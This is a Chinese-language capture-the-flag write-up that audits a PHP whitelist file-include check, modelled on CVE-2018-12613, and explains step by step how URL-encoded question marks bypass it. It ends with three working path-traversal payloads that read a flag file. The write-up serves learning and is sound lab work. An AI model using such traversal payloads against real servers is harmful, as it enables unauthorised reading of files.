CTF记事本,杂且多
打开页面,查看源代码
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<!--source.php-->
<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
发现source.php,打开发现源码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
很好,代码审计,一点儿也不nic。
发现hint.php,进去看到
flag在ffffllllaaaagggg中,看了眼代码,很弱看不懂,百度大法,发现神仙博文小白也可以看懂的漏洞分析(CVE-2018-12613),小白真的可以看懂,感天动地。
读过之后分析这道题,白名单验证,文件包含,file传参。
要执行file,需要满足if里面三个条件
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
)
- ! empty($_REQUEST[‘file’] 传入的file值不能为空
- is_string($_REQUEST[‘file’] file字段的值必须是字符串
- emmm::checkFile($_REQUEST[‘file’] ) 此函数是emmm类的一个静态方法,会对file的传参进行检查。
接下来分析emmm类,首先给出白名单内容,之后有4个if判断。
if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; }
判断page是否为空并且为字符串类型
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
判断file值是否在白名单,如果不在执行page。
mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置
in_array() 函数搜索数组中是否存在指定的值。
mb_substr() 函数返回字符串的一部分
page该段代码会截取传参之前的内容,?后的传参会被截取。然后将截取到的文件名与白名单进行匹配,也就是判断3执行的内容。如果匹配成功返回true,匹配失败接着对file的值进行处理,会执行下面的代码。
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
该段代码会对file的值进行URL解码,然后对解码后的内容截取?传参之前的内容。在将截取到的内容与白名单进行匹配,执行判断4的内容。
分析后开始构造payload,原题的意思前面的博文中见的很详细,因为urldecode函数,需要将?进行url编码成%3f。%25是%的URL编码,最后是%253f。很迷的是这道题好像下面的判断没有生效,用下面三个payload都可以出来flag…
?file=source.php?../../../../../ffffllllaaaagggg
?file=source.php%3f../../../../../ffffllllaaaagggg
?file=source.php%253f../../../../../ffffllllaaaagggg